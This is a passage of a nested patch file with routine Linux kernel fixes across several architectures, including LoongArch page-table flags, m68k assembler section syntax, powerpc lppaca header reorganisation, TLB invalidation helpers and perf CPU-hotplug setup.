+ #define	_PAGE_NO_READ_SHIFT	61
+ #define	_PAGE_NO_EXEC_SHIFT	62
+ #define	_PAGE_RPLV_SHIFT	63
+ 
+ /* Used by software */
+ #define _PAGE_PRESENT		(_ULCAST_(1) << _PAGE_PRESENT_SHIFT)
++#define _PAGE_PRESENT_INVALID	(_ULCAST_(1) << _PAGE_PRESENT_INVALID_SHIFT)
+ #define _PAGE_WRITE		(_ULCAST_(1) << _PAGE_WRITE_SHIFT)
+ #define _PAGE_ACCESSED		(_ULCAST_(1) << _PAGE_ACCESSED_SHIFT)
+ #define _PAGE_MODIFIED		(_ULCAST_(1) << _PAGE_MODIFIED_SHIFT)
+diff --git a/arch/loongarch/include/asm/pgtable.h b/arch/loongarch/include/asm/pgtable.h
+index 79d5bfd913e0f..f991e678ca4b7 100644
+--- a/arch/loongarch/include/asm/pgtable.h
++++ b/arch/loongarch/include/asm/pgtable.h
+@@ -208,7 +208,7 @@ static inline int pmd_bad(pmd_t pmd)
+ static inline int pmd_present(pmd_t pmd)
+ {
+ 	if (unlikely(pmd_val(pmd) & _PAGE_HUGE))
+-		return !!(pmd_val(pmd) & (_PAGE_PRESENT | _PAGE_PROTNONE));
++		return !!(pmd_val(pmd) & (_PAGE_PRESENT | _PAGE_PROTNONE | _PAGE_PRESENT_INVALID));
+ 
+ 	return pmd_val(pmd) != (unsigned long)invalid_pte_table;
+ }
+@@ -525,6 +525,7 @@ static inline pmd_t pmd_modify(pmd_t pmd, pgprot_t newprot)
+ 
+ static inline pmd_t pmd_mkinvalid(pmd_t pmd)
+ {
++	pmd_val(pmd) |= _PAGE_PRESENT_INVALID;
+ 	pmd_val(pmd) &= ~(_PAGE_PRESENT | _PAGE_VALID | _PAGE_DIRTY | _PAGE_PROTNONE);
+ 
+ 	return pmd;
+@@ -559,6 +560,9 @@ static inline long pmd_protnone(pmd_t pmd)
+ }
+ #endif /* CONFIG_NUMA_BALANCING */
+ 
++#define pmd_leaf(pmd)		((pmd_val(pmd) & _PAGE_HUGE) != 0)
++#define pud_leaf(pud)		((pud_val(pud) & _PAGE_HUGE) != 0)
++
+ /*
+  * We provide our own get_unmapped area to cope with the virtual aliasing
+  * constraints placed on us by the cache architecture.
+diff --git a/arch/m68k/fpsp040/skeleton.S b/arch/m68k/fpsp040/skeleton.S
+index 439395aa6fb42..081922c72daaa 100644
+--- a/arch/m68k/fpsp040/skeleton.S
++++ b/arch/m68k/fpsp040/skeleton.S
+@@ -499,13 +499,13 @@ in_ea:
+ 	dbf	%d0,morein
+ 	rts
+ 
+-	.section .fixup,#alloc,#execinstr
++	.section .fixup,"ax"
+ 	.even
+ 1:
+ 	jbsr	fpsp040_die
+ 	jbra	.Lnotkern
+ 
+-	.section __ex_table,#alloc
++	.section __ex_table,"a"
+ 	.align	4
+ 
+ 	.long	in_ea,1b
+diff --git a/arch/m68k/ifpsp060/os.S b/arch/m68k/ifpsp060/os.S
+index 7a0d6e4280665..89e2ec224ab6c 100644
+--- a/arch/m68k/ifpsp060/os.S
++++ b/arch/m68k/ifpsp060/os.S
+@@ -379,11 +379,11 @@ _060_real_access:
+ 
+ 
+| Exception handling for movs access to illegal memory
+-	.section .fixup,#alloc,#execinstr
++	.section .fixup,"ax"
+ 	.even
+ 1:	moveq		#-1,%d1
+ 	rts
+-.section __ex_table,#alloc
++.section __ex_table,"a"
+ 	.align 4
+ 	.long	dmrbuae,1b
+ 	.long	dmrwuae,1b
+diff --git a/arch/m68k/kernel/relocate_kernel.S b/arch/m68k/kernel/relocate_kernel.S
+index ab0f1e7d46535..f7667079e08e9 100644
+--- a/arch/m68k/kernel/relocate_kernel.S
++++ b/arch/m68k/kernel/relocate_kernel.S
+@@ -26,7 +26,7 @@ ENTRY(relocate_new_kernel)
+ 	lea %pc@(.Lcopy),%a4
+ 2:	addl #0x00000000,%a4		/* virt_to_phys() */
+ 
+-	.section ".m68k_fixup","aw"
++	.section .m68k_fixup,"aw"
+ 	.long M68K_FIXUP_MEMOFFSET, 2b+2
+ 	.previous
+ 
+@@ -49,7 +49,7 @@ ENTRY(relocate_new_kernel)
+ 	lea %pc@(.Lcont040),%a4
+ 5:	addl #0x00000000,%a4		/* virt_to_phys() */
+ 
+-	.section ".m68k_fixup","aw"
++	.section .m68k_fixup,"aw"
+ 	.long M68K_FIXUP_MEMOFFSET, 5b+2
+ 	.previous
+ 
+diff --git a/arch/mips/Kconfig b/arch/mips/Kconfig
+index cf1fbf4eaa8a0..0e62f5edaee2e 100644
+--- a/arch/mips/Kconfig
++++ b/arch/mips/Kconfig
+@@ -83,7 +83,6 @@ config MIPS
+ 	select HAVE_LD_DEAD_CODE_DATA_ELIMINATION
+ 	select HAVE_MOD_ARCH_SPECIFIC
+ 	select HAVE_NMI
+-	select HAVE_PATA_PLATFORM
+ 	select HAVE_PERF_EVENTS
+ 	select HAVE_PERF_REGS
+ 	select HAVE_PERF_USER_STACK_DUMP
+diff --git a/arch/parisc/kernel/processor.c b/arch/parisc/kernel/processor.c
+index dddaaa6e7a825..1f6c776d80813 100644
+--- a/arch/parisc/kernel/processor.c
++++ b/arch/parisc/kernel/processor.c
+@@ -372,10 +372,18 @@ int
+ show_cpuinfo (struct seq_file *m, void *v)
+ {
+ 	unsigned long cpu;
++	char cpu_name[60], *p;
++
++	/* strip PA path from CPU name to not confuse lscpu */
++	strlcpy(cpu_name, per_cpu(cpu_data, 0).dev->name, sizeof(cpu_name));
++	p = strrchr(cpu_name, '[');
++	if (p)
++		*(--p) = 0;
+ 
+ 	for_each_online_cpu(cpu) {
+-		const struct cpuinfo_parisc *cpuinfo = &per_cpu(cpu_data, cpu);
+ #ifdef CONFIG_SMP
++		const struct cpuinfo_parisc *cpuinfo = &per_cpu(cpu_data, cpu);
++
+ 		if (0 == cpuinfo->hpa)
+ 			continue;
+ #endif
+@@ -420,8 +428,7 @@ show_cpuinfo (struct seq_file *m, void *v)
+ 
+ 		seq_printf(m, "model\t\t: %s - %s\n",
+ 				 boot_cpu_data.pdc.sys_model_name,
+-				 cpuinfo->dev ?
+-				 cpuinfo->dev->name : "Unknown");
++				 cpu_name);
+ 
+ 		seq_printf(m, "hversion\t: 0x%08x\n"
+ 			        "sversion\t: 0x%08x\n",
+diff --git a/arch/powerpc/boot/Makefile b/arch/powerpc/boot/Makefile
+index 13fad4f0a6d8f..b13324b1a1696 100644
+--- a/arch/powerpc/boot/Makefile
++++ b/arch/powerpc/boot/Makefile
+@@ -34,8 +34,6 @@ endif
+ 
+ BOOTCFLAGS    := -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs \
+ 		 -fno-strict-aliasing -O2 -msoft-float -mno-altivec -mno-vsx \
+-		 $(call cc-option,-mno-prefixed) $(call cc-option,-mno-pcrel) \
+-		 $(call cc-option,-mno-mma) \
+ 		 $(call cc-option,-mno-spe) $(call cc-option,-mspe=no) \
+ 		 -pipe -fomit-frame-pointer -fno-builtin -fPIC -nostdinc \
+ 		 $(LINUXINCLUDE)
+@@ -71,6 +69,10 @@ BOOTAFLAGS	:= -D__ASSEMBLY__ $(BOOTCFLAGS) -nostdinc
+ 
+ BOOTARFLAGS	:= -crD
+ 
++BOOTCFLAGS	+= $(call cc-option,-mno-prefixed) \
++		   $(call cc-option,-mno-pcrel) \
++		   $(call cc-option,-mno-mma)
++
+ ifdef CONFIG_CC_IS_CLANG
+ BOOTCFLAGS += $(CLANG_FLAGS)
+ BOOTAFLAGS += $(CLANG_FLAGS)
+diff --git a/arch/powerpc/include/asm/lppaca.h b/arch/powerpc/include/asm/lppaca.h
+index 34d44cb17c874..ee1488d38fdc1 100644
+--- a/arch/powerpc/include/asm/lppaca.h
++++ b/arch/powerpc/include/asm/lppaca.h
+@@ -45,6 +45,7 @@
+ #include <asm/types.h>
+ #include <asm/mmu.h>
+ #include <asm/firmware.h>
++#include <asm/paca.h>
+ 
+ /*
+  * The lppaca is the "virtual processor area" registered with the hypervisor,
+@@ -127,13 +128,23 @@ struct lppaca {
+  */
+ #define LPPACA_OLD_SHARED_PROC		2
+ 
+-static inline bool lppaca_shared_proc(struct lppaca *l)
++#ifdef CONFIG_PPC_PSERIES
++/*
++ * All CPUs should have the same shared proc value, so directly access the PACA
++ * to avoid false positives from DEBUG_PREEMPT.
++ */
++static inline bool lppaca_shared_proc(void)
+ {
++	struct lppaca *l = local_paca->lppaca_ptr;
++
+ 	if (!firmware_has_feature(FW_FEATURE_SPLPAR))
+ 		return false;
+ 	return !!(l->__old_status & LPPACA_OLD_SHARED_PROC);
+ }
+ 
++#define get_lppaca()	(get_paca()->lppaca_ptr)
++#endif
++
+ /*
+  * SLB shadow buffer structure as defined in the PAPR.  The save_area
+  * contains adjacent ESID and VSID pairs for each shadowed SLB.  The
+diff --git a/arch/powerpc/include/asm/paca.h b/arch/powerpc/include/asm/paca.h
+index 0ab3511a47d77..183b5a251804c 100644
+--- a/arch/powerpc/include/asm/paca.h
++++ b/arch/powerpc/include/asm/paca.h
+@@ -15,7 +15,6 @@
+ #include <linux/cache.h>
+ #include <linux/string.h>
+ #include <asm/types.h>
+-#include <asm/lppaca.h>
+ #include <asm/mmu.h>
+ #include <asm/page.h>
+ #ifdef CONFIG_PPC_BOOK3E_64
+@@ -47,14 +46,11 @@ extern unsigned int debug_smp_processor_id(void); /* from linux/smp.h */
+ #define get_paca()	local_paca
+ #endif
+ 
+-#ifdef CONFIG_PPC_PSERIES
+-#define get_lppaca()	(get_paca()->lppaca_ptr)
+-#endif
+-
+ #define get_slb_shadow()	(get_paca()->slb_shadow_ptr)
+ 
+ struct task_struct;
+ struct rtas_args;
++struct lppaca;
+ 
+ /*
+  * Defines the layout of the paca.
+diff --git a/arch/powerpc/include/asm/paravirt.h b/arch/powerpc/include/asm/paravirt.h
+index f5ba1a3c41f8e..e08513d731193 100644
+--- a/arch/powerpc/include/asm/paravirt.h
++++ b/arch/powerpc/include/asm/paravirt.h
+@@ -6,6 +6,7 @@
+ #include <asm/smp.h>
+ #ifdef CONFIG_PPC64
+ #include <asm/paca.h>
++#include <asm/lppaca.h>
+ #include <asm/hvcall.h>
+ #endif
+ 
+diff --git a/arch/powerpc/include/asm/plpar_wrappers.h b/arch/powerpc/include/asm/plpar_wrappers.h
+index 8239c0af5eb2b..fe3d0ea0058ac 100644
+--- a/arch/powerpc/include/asm/plpar_wrappers.h
++++ b/arch/powerpc/include/asm/plpar_wrappers.h
+@@ -9,6 +9,7 @@
+ 
+ #include <asm/hvcall.h>
+ #include <asm/paca.h>
++#include <asm/lppaca.h>
+ #include <asm/page.h>
+ 
+ static inline long poll_pending(void)
+diff --git a/arch/powerpc/kernel/fadump.c b/arch/powerpc/kernel/fadump.c
+index ea0a073abd969..3ff2da7b120b5 100644
+--- a/arch/powerpc/kernel/fadump.c
++++ b/arch/powerpc/kernel/fadump.c
+@@ -654,6 +654,7 @@ int __init fadump_reserve_mem(void)
+ 	return ret;
+ error_out:
+ 	fw_dump.fadump_enabled = 0;
++	fw_dump.reserve_dump_area_size = 0;
+ 	return 0;
+ }
+ 
+diff --git a/arch/powerpc/kernel/iommu.c b/arch/powerpc/kernel/iommu.c
+index b8b7a189cd3ce..a612abe4bfd57 100644
+--- a/arch/powerpc/kernel/iommu.c
++++ b/arch/powerpc/kernel/iommu.c
+@@ -171,17 +171,28 @@ static int fail_iommu_bus_notify(struct notifier_block *nb,
+ 	return 0;
+ }
+ 
+-static struct notifier_block fail_iommu_bus_notifier = {
++/*
++ * PCI and VIO buses need separate notifier_block structs, since they're linked
++ * list nodes.  Sharing a notifier_block would mean that any notifiers later
++ * registered for PCI buses would also get called by VIO buses and vice versa.
++ */
++static struct notifier_block fail_iommu_pci_bus_notifier = {
+ 	.notifier_call = fail_iommu_bus_notify
+ };
+ 
++#ifdef CONFIG_IBMVIO
++static struct notifier_block fail_iommu_vio_bus_notifier = {
++	.notifier_call = fail_iommu_bus_notify
++};
++#endif
++
+ static int __init fail_iommu_setup(void)
+ {
+ #ifdef CONFIG_PCI
+-	bus_register_notifier(&pci_bus_type, &fail_iommu_bus_notifier);
++	bus_register_notifier(&pci_bus_type, &fail_iommu_pci_bus_notifier);
+ #endif
+ #ifdef CONFIG_IBMVIO
+-	bus_register_notifier(&vio_bus_type, &fail_iommu_bus_notifier);
++	bus_register_notifier(&vio_bus_type, &fail_iommu_vio_bus_notifier);
+ #endif
+ 
+ 	return 0;
+diff --git a/arch/powerpc/kvm/book3s_hv_ras.c b/arch/powerpc/kvm/book3s_hv_ras.c
+index ccfd969656306..82be6d87514b7 100644
+--- a/arch/powerpc/kvm/book3s_hv_ras.c
++++ b/arch/powerpc/kvm/book3s_hv_ras.c
+@@ -9,6 +9,7 @@
+ #include <linux/kvm.h>
+ #include <linux/kvm_host.h>
+ #include <linux/kernel.h>
++#include <asm/lppaca.h>
+ #include <asm/opal.h>
+ #include <asm/mce.h>
+ #include <asm/machdep.h>
+diff --git a/arch/powerpc/mm/book3s64/radix_tlb.c b/arch/powerpc/mm/book3s64/radix_tlb.c
+index 6d7a1ef723e69..a8ba04dcb20fa 100644
+--- a/arch/powerpc/mm/book3s64/radix_tlb.c
++++ b/arch/powerpc/mm/book3s64/radix_tlb.c
+@@ -127,21 +127,6 @@ static __always_inline void __tlbie_pid(unsigned long pid, unsigned long ric)
+ 	trace_tlbie(0, 0, rb, rs, ric, prs, r);
+ }
+ 
+-static __always_inline void __tlbie_pid_lpid(unsigned long pid,
+-					     unsigned long lpid,
+-					     unsigned long ric)
+-{
+-	unsigned long rb, rs, prs, r;
+-
+-	rb = PPC_BIT(53); /* IS = 1 */
+-	rs = (pid << PPC_BITLSHIFT(31)) | (lpid & ~(PPC_BITMASK(0, 31)));
+-	prs = 1; /* process scoped */
+-	r = 1;   /* radix format */
+-
+-	asm volatile(PPC_TLBIE_5(%0, %4, %3, %2, %1)
+-		     : : "r"(rb), "i"(r), "i"(prs), "i"(ric), "r"(rs) : "memory");
+-	trace_tlbie(0, 0, rb, rs, ric, prs, r);
+-}
+ static __always_inline void __tlbie_lpid(unsigned long lpid, unsigned long ric)
+ {
+ 	unsigned long rb,rs,prs,r;
+@@ -202,23 +187,6 @@ static __always_inline void __tlbie_va(unsigned long va, unsigned long pid,
+ 	trace_tlbie(0, 0, rb, rs, ric, prs, r);
+ }
+ 
+-static __always_inline void __tlbie_va_lpid(unsigned long va, unsigned long pid,
+-					    unsigned long lpid,
+-					    unsigned long ap, unsigned long ric)
+-{
+-	unsigned long rb, rs, prs, r;
+-
+-	rb = va & ~(PPC_BITMASK(52, 63));
+-	rb |= ap << PPC_BITLSHIFT(58);
+-	rs = (pid << PPC_BITLSHIFT(31)) | (lpid & ~(PPC_BITMASK(0, 31)));
+-	prs = 1; /* process scoped */
+-	r = 1;   /* radix format */
+-
+-	asm volatile(PPC_TLBIE_5(%0, %4, %3, %2, %1)
+-		     : : "r"(rb), "i"(r), "i"(prs), "i"(ric), "r"(rs) : "memory");
+-	trace_tlbie(0, 0, rb, rs, ric, prs, r);
+-}
+-
+ static __always_inline void __tlbie_lpid_va(unsigned long va, unsigned long lpid,
+ 					    unsigned long ap, unsigned long ric)
+ {
+@@ -264,22 +232,6 @@ static inline void fixup_tlbie_va_range(unsigned long va, unsigned long pid,
+ 	}
+ }
+ 
+-static inline void fixup_tlbie_va_range_lpid(unsigned long va,
+-					     unsigned long pid,
+-					     unsigned long lpid,
+-					     unsigned long ap)
+-{
+-	if (cpu_has_feature(CPU_FTR_P9_TLBIE_ERAT_BUG)) {
+-		asm volatile("ptesync" : : : "memory");
+-		__tlbie_pid_lpid(0, lpid, RIC_FLUSH_TLB);
+-	}
+-
+-	if (cpu_has_feature(CPU_FTR_P9_TLBIE_STQ_BUG)) {
+-		asm volatile("ptesync" : : : "memory");
+-		__tlbie_va_lpid(va, pid, lpid, ap, RIC_FLUSH_TLB);
+-	}
+-}
+-
+ static inline void fixup_tlbie_pid(unsigned long pid)
+ {
+ 	/*
+@@ -299,26 +251,6 @@ static inline void fixup_tlbie_pid(unsigned long pid)
+ 	}
+ }
+ 
+-static inline void fixup_tlbie_pid_lpid(unsigned long pid, unsigned long lpid)
+-{
+-	/*
+-	 * We can use any address for the invalidation, pick one which is
+-	 * probably unused as an optimisation.
+-	 */
+-	unsigned long va = ((1UL << 52) - 1);
+-
+-	if (cpu_has_feature(CPU_FTR_P9_TLBIE_ERAT_BUG)) {
+-		asm volatile("ptesync" : : : "memory");
+-		__tlbie_pid_lpid(0, lpid, RIC_FLUSH_TLB);
+-	}
+-
+-	if (cpu_has_feature(CPU_FTR_P9_TLBIE_STQ_BUG)) {
+-		asm volatile("ptesync" : : : "memory");
+-		__tlbie_va_lpid(va, pid, lpid, mmu_get_ap(MMU_PAGE_64K),
+-				RIC_FLUSH_TLB);
+-	}
+-}
+-
+ static inline void fixup_tlbie_lpid_va(unsigned long va, unsigned long lpid,
+ 				       unsigned long ap)
+ {
+@@ -416,31 +348,6 @@ static inline void _tlbie_pid(unsigned long pid, unsigned long ric)
+ 	asm volatile("eieio; tlbsync; ptesync": : :"memory");
+ }
+ 
+-static inline void _tlbie_pid_lpid(unsigned long pid, unsigned long lpid,
+-				   unsigned long ric)
+-{
+-	asm volatile("ptesync" : : : "memory");
+-
+-	/*
+-	 * Workaround the fact that the "ric" argument to __tlbie_pid
+-	 * must be a compile-time contraint to match the "i" constraint
+-	 * in the asm statement.
+-	 */
+-	switch (ric) {
+-	case RIC_FLUSH_TLB:
+-		__tlbie_pid_lpid(pid, lpid, RIC_FLUSH_TLB);
+-		fixup_tlbie_pid_lpid(pid, lpid);
+-		break;
+-	case RIC_FLUSH_PWC:
+-		__tlbie_pid_lpid(pid, lpid, RIC_FLUSH_PWC);
+-		break;
+-	case RIC_FLUSH_ALL:
+-	default:
+-		__tlbie_pid_lpid(pid, lpid, RIC_FLUSH_ALL);
+-		fixup_tlbie_pid_lpid(pid, lpid);
+-	}
+-	asm volatile("eieio; tlbsync; ptesync" : : : "memory");
+-}
+ struct tlbiel_pid {
+ 	unsigned long pid;
+ 	unsigned long ric;
+@@ -566,20 +473,6 @@ static inline void __tlbie_va_range(unsigned long start, unsigned long end,
+ 	fixup_tlbie_va_range(addr - page_size, pid, ap);
+ }
+ 
+-static inline void __tlbie_va_range_lpid(unsigned long start, unsigned long end,
+-					 unsigned long pid, unsigned long lpid,
+-					 unsigned long page_size,
+-					 unsigned long psize)
+-{
+-	unsigned long addr;
+-	unsigned long ap = mmu_get_ap(psize);
+-
+-	for (addr = start; addr < end; addr += page_size)
+-		__tlbie_va_lpid(addr, pid, lpid, ap, RIC_FLUSH_TLB);
+-
+-	fixup_tlbie_va_range_lpid(addr - page_size, pid, lpid, ap);
+-}
+-
+ static __always_inline void _tlbie_va(unsigned long va, unsigned long pid,
+ 				      unsigned long psize, unsigned long ric)
+ {
+@@ -660,18 +553,6 @@ static inline void _tlbie_va_range(unsigned long start, unsigned long end,
+ 	asm volatile("eieio; tlbsync; ptesync": : :"memory");
+ }
+ 
+-static inline void _tlbie_va_range_lpid(unsigned long start, unsigned long end,
+-					unsigned long pid, unsigned long lpid,
+-					unsigned long page_size,
+-					unsigned long psize, bool also_pwc)
+-{
+-	asm volatile("ptesync" : : : "memory");
+-	if (also_pwc)
+-		__tlbie_pid_lpid(pid, lpid, RIC_FLUSH_PWC);
+-	__tlbie_va_range_lpid(start, end, pid, lpid, page_size, psize);
+-	asm volatile("eieio; tlbsync; ptesync" : : : "memory");
+-}
+-
+ static inline void _tlbiel_va_range_multicast(struct mm_struct *mm,
+ 				unsigned long start, unsigned long end,
+ 				unsigned long pid, unsigned long page_size,
+@@ -1476,6 +1357,127 @@ void radix__flush_tlb_all(void)
+ }
+ 
+ #ifdef CONFIG_KVM_BOOK3S_HV_POSSIBLE
++static __always_inline void __tlbie_pid_lpid(unsigned long pid,
++					     unsigned long lpid,
++					     unsigned long ric)
++{
++	unsigned long rb, rs, prs, r;
++
++	rb = PPC_BIT(53); /* IS = 1 */
++	rs = (pid << PPC_BITLSHIFT(31)) | (lpid & ~(PPC_BITMASK(0, 31)));
++	prs = 1; /* process scoped */
++	r = 1;   /* radix format */
++
++	asm volatile(PPC_TLBIE_5(%0, %4, %3, %2, %1)
++		     : : "r"(rb), "i"(r), "i"(prs), "i"(ric), "r"(rs) : "memory");
++	trace_tlbie(0, 0, rb, rs, ric, prs, r);
++}
++
++static __always_inline void __tlbie_va_lpid(unsigned long va, unsigned long pid,
++					    unsigned long lpid,
++					    unsigned long ap, unsigned long ric)
++{
++	unsigned long rb, rs, prs, r;
++
++	rb = va & ~(PPC_BITMASK(52, 63));
++	rb |= ap << PPC_BITLSHIFT(58);
++	rs = (pid << PPC_BITLSHIFT(31)) | (lpid & ~(PPC_BITMASK(0, 31)));
++	prs = 1; /* process scoped */
++	r = 1;   /* radix format */
++
++	asm volatile(PPC_TLBIE_5(%0, %4, %3, %2, %1)
++		     : : "r"(rb), "i"(r), "i"(prs), "i"(ric), "r"(rs) : "memory");
++	trace_tlbie(0, 0, rb, rs, ric, prs, r);
++}
++
++static inline void fixup_tlbie_pid_lpid(unsigned long pid, unsigned long lpid)
++{
++	/*
++	 * We can use any address for the invalidation, pick one which is
++	 * probably unused as an optimisation.
++	 */
++	unsigned long va = ((1UL << 52) - 1);
++
++	if (cpu_has_feature(CPU_FTR_P9_TLBIE_ERAT_BUG)) {
++		asm volatile("ptesync" : : : "memory");
++		__tlbie_pid_lpid(0, lpid, RIC_FLUSH_TLB);
++	}
++
++	if (cpu_has_feature(CPU_FTR_P9_TLBIE_STQ_BUG)) {
++		asm volatile("ptesync" : : : "memory");
++		__tlbie_va_lpid(va, pid, lpid, mmu_get_ap(MMU_PAGE_64K),
++				RIC_FLUSH_TLB);
++	}
++}
++
++static inline void _tlbie_pid_lpid(unsigned long pid, unsigned long lpid,
++				   unsigned long ric)
++{
++	asm volatile("ptesync" : : : "memory");
++
++	/*
++	 * Work around the fact that the "ric" argument to __tlbie_pid
++	 * must be a compile-time constraint to match the "i" constraint
++	 * in the asm statement.
++	 */
++	switch (ric) {
++	case RIC_FLUSH_TLB:
++		__tlbie_pid_lpid(pid, lpid, RIC_FLUSH_TLB);
++		fixup_tlbie_pid_lpid(pid, lpid);
++		break;
++	case RIC_FLUSH_PWC:
++		__tlbie_pid_lpid(pid, lpid, RIC_FLUSH_PWC);
++		break;
++	case RIC_FLUSH_ALL:
++	default:
++		__tlbie_pid_lpid(pid, lpid, RIC_FLUSH_ALL);
++		fixup_tlbie_pid_lpid(pid, lpid);
++	}
++	asm volatile("eieio; tlbsync; ptesync" : : : "memory");
++}
++
++static inline void fixup_tlbie_va_range_lpid(unsigned long va,
++					     unsigned long pid,
++					     unsigned long lpid,
++					     unsigned long ap)
++{
++	if (cpu_has_feature(CPU_FTR_P9_TLBIE_ERAT_BUG)) {
++		asm volatile("ptesync" : : : "memory");
++		__tlbie_pid_lpid(0, lpid, RIC_FLUSH_TLB);
++	}
++
++	if (cpu_has_feature(CPU_FTR_P9_TLBIE_STQ_BUG)) {
++		asm volatile("ptesync" : : : "memory");
++		__tlbie_va_lpid(va, pid, lpid, ap, RIC_FLUSH_TLB);
++	}
++}
++
++static inline void __tlbie_va_range_lpid(unsigned long start, unsigned long end,
++					 unsigned long pid, unsigned long lpid,
++					 unsigned long page_size,
++					 unsigned long psize)
++{
++	unsigned long addr;
++	unsigned long ap = mmu_get_ap(psize);
++
++	for (addr = start; addr < end; addr += page_size)
++		__tlbie_va_lpid(addr, pid, lpid, ap, RIC_FLUSH_TLB);
++
++	fixup_tlbie_va_range_lpid(addr - page_size, pid, lpid, ap);
++}
++
++static inline void _tlbie_va_range_lpid(unsigned long start, unsigned long end,
++					unsigned long pid, unsigned long lpid,
++					unsigned long page_size,
++					unsigned long psize, bool also_pwc)
++{
++	asm volatile("ptesync" : : : "memory");
++	if (also_pwc)
++		__tlbie_pid_lpid(pid, lpid, RIC_FLUSH_PWC);
++	__tlbie_va_range_lpid(start, end, pid, lpid, page_size, psize);
++	asm volatile("eieio; tlbsync; ptesync" : : : "memory");
++}
++
+ /*
+  * Performs process-scoped invalidations for a given LPID
+  * as part of H_RPT_INVALIDATE hcall.
+diff --git a/arch/powerpc/mm/book3s64/slb.c b/arch/powerpc/mm/book3s64/slb.c
+index 6956f637a38c1..f2708c8629a52 100644
+--- a/arch/powerpc/mm/book3s64/slb.c
++++ b/arch/powerpc/mm/book3s64/slb.c
+@@ -13,6 +13,7 @@
+ #include <asm/mmu.h>
+ #include <asm/mmu_context.h>
+ #include <asm/paca.h>
++#include <asm/lppaca.h>
+ #include <asm/ppc-opcode.h>
+ #include <asm/cputable.h>
+ #include <asm/cacheflush.h>
+diff --git a/arch/powerpc/perf/core-fsl-emb.c b/arch/powerpc/perf/core-fsl-emb.c
+index ee721f420a7ba..1a53ab08447cb 100644
+--- a/arch/powerpc/perf/core-fsl-emb.c
++++ b/arch/powerpc/perf/core-fsl-emb.c
+@@ -645,7 +645,6 @@ static void perf_event_interrupt(struct pt_regs *regs)
+ 	struct cpu_hw_events *cpuhw = this_cpu_ptr(&cpu_hw_events);
+ 	struct perf_event *event;
+ 	unsigned long val;
+-	int found = 0;
+ 
+ 	for (i = 0; i < ppmu->n_counter; ++i) {
+ 		event = cpuhw->event[i];
+@@ -654,7 +653,6 @@ static void perf_event_interrupt(struct pt_regs *regs)
+ 		if ((int)val < 0) {
+ 			if (event) {
+ 				/* event has overflowed */
+-				found = 1;
+ 				record_and_restart(event, val, regs);
+ 			} else {
+ 				/*
+@@ -672,11 +670,13 @@ static void perf_event_interrupt(struct pt_regs *regs)
+ 	isync();
+ }
+ 
+-void hw_perf_event_setup(int cpu)
++static int fsl_emb_pmu_prepare_cpu(unsigned int cpu)
+ {
+ 	struct cpu_hw_events *cpuhw = &per_cpu(cpu_hw_events, cpu);
+ 
+ 	memset(cpuhw, 0, sizeof(*cpuhw));
++
++	return 0;
+ }
+ 
+ int register_fsl_emb_pmu(struct fsl_emb_pmu *pmu)
+@@ -689,6 +689,8 @@ int register_fsl_emb_pmu(struct fsl_emb_pmu *pmu)
+ 		pmu->name);
+ 
+ 	perf_pmu_register(&fsl_emb_pmu, "cpu", PERF_TYPE_RAW);
++	cpuhp_setup_state(CPUHP_PERF_POWER, "perf/powerpc:prepare",
++			  fsl_emb_pmu_prepare_cpu, NULL);
+ 
+ 	return 0;
+ }
+diff --git a/arch/powerpc/platforms/powermac/time.c b/arch/powerpc/platforms/powermac/time.c
+index 4c5790aff1b54..8633891b7aa58 100644
+--- a/arch/powerpc/platforms/powermac/time.c
++++ b/arch/powerpc/platforms/powermac/time.c
+@@ -26,8 +26,8 @@
+ #include <linux/rtc.h>
+ #include <linux/of_address.h>
+ 
++#include <asm/early_ioremap.h>
+ #include <asm/sections.h>
+-#include <asm/io.h>
+ #include <asm/machdep.h>
+ #include <asm/time.h>
+ #include <asm/nvram.h>
+@@ -182,7 +182,7 @@ static int __init via_calibrate_decr(void)
+ 		return 0;
+ 	}
+ 	of_node_put(vias);
+-	via = ioremap(rsrc.start, resource_size(&rsrc));
++	via = early_ioremap(rsrc.start, resource_size(&rsrc));
+ 	if (via == NULL) {
+ 		printk(KERN_ERR "Failed to map VIA for timer calibration !\n");
+ 		return 0;
+@@ -207,7 +207,7 @@ static int __init via_calibrate_decr(void)
+ 
+ 	ppc_tb_freq = (dstart - dend) * 100 / 6;
+ 
+-	iounmap(via);
++	early_iounmap((void *)via, resource_size(&rsrc));
+ 
+ 	return 1;
+ }
+diff --git a/arch/powerpc/platforms/pseries/hvCall.S b/arch/powerpc/platforms/pseries/hvCall.S
+index 762eb15d3bd42..fc50b9c27c1ba 100644
+--- a/arch/powerpc/platforms/pseries/hvCall.S
++++ b/arch/powerpc/platforms/pseries/hvCall.S
+@@ -89,6 +89,7 @@ BEGIN_FTR_SECTION;						\
+ 	b	1f;						\
+ END_FTR_SECTION(0, 1);						\
+ 	LOAD_REG_ADDR(r12, hcall_tracepoint_refcount) ;		\
++	ld	r12,0(r12);					\
+ 	std	r12,32(r1);					\
+ 	cmpdi	r12,0;						\
+ 	bne-	LABEL;						\
+diff --git a/arch/powerpc/platforms/pseries/lpar.c b/arch/powerpc/platforms/pseries/lpar.c
+index 97ef6499e5019..2c2812a87d470 100644
+--- a/arch/powerpc/platforms/pseries/lpar.c
++++ b/arch/powerpc/platforms/pseries/lpar.c
+@@ -638,16 +638,8 @@ static const struct proc_ops vcpudispatch_stats_freq_proc_ops = {
+ 
+ static int __init vcpudispatch_stats_procfs_init(void)
+ {
+-	/*
+-	 * Avoid smp_processor_id while preemptible. All CPUs should have
+-	 * the same value for lppaca_shared_proc.
+-	 */
+-	preempt_disable();
+-	if (!lppaca_shared_proc(get_lppaca())) {
+-		preempt_enable();
++	if (!lppaca_shared_proc())
+ 		return 0;
+-	}
+-	preempt_enable();
+ 
+ 	if (!proc_create("powerpc/vcpudispatch_stats", 0600, NULL,
+ 					&vcpudispatch_stats_proc_ops))
+diff --git a/arch/powerpc/platforms/pseries/lparcfg.c b/arch/powerpc/platforms/pseries/lparcfg.c
+index 63fd925ccbb83..ca10a3682c46e 100644
+--- a/arch/powerpc/platforms/pseries/lparcfg.c
++++ b/arch/powerpc/platforms/pseries/lparcfg.c
+@@ -205,7 +205,7 @@ static void parse_ppp_data(struct seq_file *m)
+ 	           ppp_data.active_system_procs);
+ 
+ 	/* pool related entries are appropriate for shared configs */
+-	if (lppaca_shared_proc(get_lppaca())) {
++	if (lppaca_shared_proc()) {
+ 		unsigned long pool_idle_time, pool_procs;
+ 
+ 		seq_printf(m, "pool=%d\n", ppp_data.pool_num);
+@@ -616,7 +616,7 @@ static int pseries_lparcfg_data(struct seq_file *m, void *v)
+ 		   partition_potential_processors);
